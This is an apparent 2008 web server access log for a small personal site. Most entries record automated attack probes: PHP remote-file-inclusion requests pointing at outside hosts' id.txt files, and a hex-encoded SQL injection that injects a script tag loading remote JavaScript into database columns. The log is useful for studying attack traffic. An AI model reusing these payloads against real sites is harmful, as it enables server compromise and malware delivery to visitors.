87.230.21.231 - - [21/Aug/2008:23:15:52 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:23:15:52 -0500] "GET /logs/access_log.1209600000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:23:16:05 -0500] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
74.6.8.121 - - [21/Aug/2008:23:16:44 -0500] "GET /logs/access_log.1160265600 HTTP/1.0" 200 246319 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
190.138.152.162 - - [21/Aug/2008:23:17:01 -0500] "GET /!scanhttp://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
216.235.247.169 - - [21/Aug/2008:23:18:04 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
216.235.247.169 - - [21/Aug/2008:23:18:04 -0500] "GET ///vwar/backup/errors.php?error=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
216.235.247.169 - - [21/Aug/2008:23:18:04 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.230.21.231 - - [21/Aug/2008:23:18:24 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:23:18:24 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:23:18:24 -0500] "GET /logs/access_log.1209600000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
208.80.193.26 - - [21/Aug/2008:23:18:43 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {7BD48EC9-F271-E440-BBC7-66A8CC02F2EE}; .NET CLR 1.1.4322; ZangoToolbar 4.8.3)"
216.235.247.169 - - [21/Aug/2008:23:19:12 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
87.230.21.231 - - [21/Aug/2008:23:19:15 -0500] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
87.238.163.18 - - [21/Aug/2008:23:19:44 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:23:19:44 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
81.177.25.12 - - [21/Aug/2008:23:21:15 -0500] "GET /logs//main.php?sayfa=http://www.beyars.com/readme.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.177.25.12 - - [21/Aug/2008:23:21:15 -0500] "GET /logs//main.php?sayfa=http://www.beyars.com/readme.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.177.25.12 - - [21/Aug/2008:23:21:15 -0500] "GET /logs//main.php?sayfa=http://www.beyars.com/readme.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.177.25.12 - - [21/Aug/2008:23:21:15 -0500] "GET //main.php?sayfa=http://www.beyars.com/readme.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.177.25.12 - - [21/Aug/2008:23:21:15 -0500] "GET //main.php?sayfa=http://www.beyars.com/readme.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.177.25.12 - - [21/Aug/2008:23:21:15 -0500] "GET //main.php?sayfa=http://www.beyars.com/readme.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.185.237.191 - - [21/Aug/2008:23:22:04 -0500] "GET /logs//errors.php?error=http://www.orangephoto.eu/main/plugins/id.txt%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
64.185.237.191 - - [21/Aug/2008:23:22:04 -0500] "GET /logs/access_log.1208044800//errors.php?error=http://www.orangephoto.eu/main/plugins/id.txt%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
64.185.237.191 - - [21/Aug/2008:23:22:04 -0500] "GET //errors.php?error=http://www.orangephoto.eu/main/plugins/id.txt%0D?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
64.185.237.191 - - [21/Aug/2008:23:22:51 -0500] "GET /logs/access_log.1206230400//errors.php?error=http://www.orangephoto.eu/main/plugins/id.txt%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
81.169.137.253 - - [21/Aug/2008:23:23:02 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:23:23:02 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
64.185.237.191 - - [21/Aug/2008:23:24:12 -0500] "GET /logs/access_log.1208044800//errors.php?error=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
64.185.237.191 - - [21/Aug/2008:23:24:12 -0500] "GET //errors.php?error=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
64.185.237.191 - - [21/Aug/2008:23:24:23 -0500] "GET /logs//errors.php?error=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
64.185.237.191 - - [21/Aug/2008:23:24:24 -0500] "GET //errors.php?error=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.185.237.191 - - [21/Aug/2008:23:24:27 -0500] "GET /logs/access_log.1208044800//errors.php?error=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.185.237.191 - - [21/Aug/2008:23:24:31 -0500] "GET /logs//errors.php?error=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
66.115.174.234 - - [21/Aug/2008:23:24:49 -0500] "GET /logs/access_log.1211500800//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:23:25:42 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.238.163.18 - - [21/Aug/2008:23:25:43 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.eugeniosales.com/fufu.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
208.116.1.202 - - [21/Aug/2008:23:25:52 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
208.116.1.202 - - [21/Aug/2008:23:25:52 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
200.93.147.155 - - [21/Aug/2008:23:26:12 -0500] "GET /logs/SQuery/lib/gore.php?libpath=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.93.147.155 - - [21/Aug/2008:23:26:12 -0500] "GET /logs/SQuery/lib/gore.php?libpath=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
200.93.147.155 - - [21/Aug/2008:23:26:12 -0500] "GET /SQuery/lib/gore.php?libpath=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
200.93.147.155 - - [21/Aug/2008:23:26:12 -0500] "GET /SQuery/lib/gore.php?libpath=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
64.185.237.191 - - [21/Aug/2008:23:26:29 -0500] "GET /logs/access_log.1206230400//errors.php?error=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.185.237.191 - - [21/Aug/2008:23:26:35 -0500] "GET /logs/access_log.1206230400//errors.php?error=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
64.185.237.191 - - [21/Aug/2008:23:29:25 -0500] "GET /logs/access_log.1216598400//include/write.php?dir=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.185.237.191 - - [21/Aug/2008:23:29:25 -0500] "GET //include/write.php?dir=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.185.237.191 - - [21/Aug/2008:23:29:25 -0500] "GET /logs//include/write.php?dir=http://www.projektgegenpart.org/idr.txt%0D? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
66.115.174.234 - - [21/Aug/2008:23:29:30 -0500] "GET /logs/access_log.1214438400//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
59.167.191.250 - - [21/Aug/2008:23:31:37 -0500] "GET /logs/access_log.1203724800/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
59.167.191.250 - - [21/Aug/2008:23:31:37 -0500] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
59.167.191.250 - - [21/Aug/2008:23:31:40 -0500] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 96216 "-""libwww-perl/5.805"
59.167.191.250 - - [21/Aug/2008:23:32:18 -0500] "GET /logs/access_log.1206230400/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
216.139.67.90 - - [21/Aug/2008:23:32:19 -0500] "GET /logs/access_log.1213488000%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.64"
216.139.67.90 - - [21/Aug/2008:23:32:19 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
216.139.67.90 - - [21/Aug/2008:23:32:19 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
211.202.2.15 - - [21/Aug/2008:23:33:41 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
211.202.2.15 - - [21/Aug/2008:23:33:42 -0500] "GET //?path%5Bdocroot%5D=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
211.202.2.15 - - [21/Aug/2008:23:33:43 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 96221 "-""libwww-perl/5.79"
81.169.137.253 - - [21/Aug/2008:23:34:51 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
71.146.30.95 - - [21/Aug/2008:23:34:58 -0500] "GET /logs/access_log.1206230400?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 2.0.50727)"
81.169.137.253 - - [21/Aug/2008:23:35:43 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:23:35:43 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
71.146.30.95 - - [21/Aug/2008:23:35:43 -0500] "GET /logs/access_log.1206230400?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 195475 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 2.0.50727)"
71.146.30.95 - - [21/Aug/2008:23:36:29 -0500] "GET /logs/access_log.1208044800?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 2.0.50727)"
216.235.247.169 - - [21/Aug/2008:23:36:41 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
216.235.247.169 - - [21/Aug/2008:23:36:41 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
71.146.30.95 - - [21/Aug/2008:23:37:29 -0500] "GET /logs/access_log.1208044800?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 2.0.50727)"
87.230.21.231 - - [21/Aug/2008:23:38:40 -0500] "GET /logs/access_log.1209600000//modules/postguestbook/styles/internal/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:23:38:40 -0500] "GET //modules/postguestbook/styles/internal/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:23:38:40 -0500] "GET /logs//modules/postguestbook/styles/internal/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
87.230.21.231 - - [21/Aug/2008:23:39:11 -0500] "GET /logs/access_log.1203724800//modules/postguestbook/styles/internal/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
74.6.22.187 - - [21/Aug/2008:23:40:00 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.220 - - [21/Aug/2008:23:40:01 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.206.238.35 - - [21/Aug/2008:23:40:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
216.206.238.35 - - [21/Aug/2008:23:40:38 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
69.105.57.66 - - [21/Aug/2008:23:41:13 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:13 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:13 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:20 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:20 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:20 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:20 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:20 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:20 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:20 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:21 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:21 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:22 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
69.105.57.66 - - [21/Aug/2008:23:41:23 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10"
211.202.2.15 - - [21/Aug/2008:23:41:27 -0500] "GET //?path%5Bdocroot%5D=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
207.58.137.81 - - [21/Aug/2008:23:41:39 -0500] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://purearcade.com/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
207.58.137.81 - - [21/Aug/2008:23:41:39 -0500] "GET /layout/default/params.php?gConf[dir][layouts]=http://purearcade.com/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
81.169.137.253 - - [21/Aug/2008:23:41:40 -0500] "GET //appserv/main.php?appserv_root=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
81.169.137.253 - - [21/Aug/2008:23:41:40 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.tes2008.kit.net/id.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
216.235.247.169 - - [21/Aug/2008:23:41:40 -0500] "GET /logs/access_log.1214524800/phphtml.php?htmlclass_path=http://www.21stcenturywoman.com/pics/echo? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
204.11.238.210 - - [21/Aug/2008:23:41:47 -0500] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://h1.ripway.com/bhlcrew/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
204.11.238.210 - - [21/Aug/2008:23:41:49 -0500] "GET /layout/default/params.php?gConf[dir][layouts]=http://h1.ripway.com/bhlcrew/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
204.11.238.210 - - [21/Aug/2008:23:41:53 -0500] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://h1.ripway.com/bhlcrew/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
204.11.238.210 - - [21/Aug/2008:23:41:53 -0500] "GET /layout/default/params.php?gConf[dir][layouts]=http://h1.ripway.com/bhlcrew/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
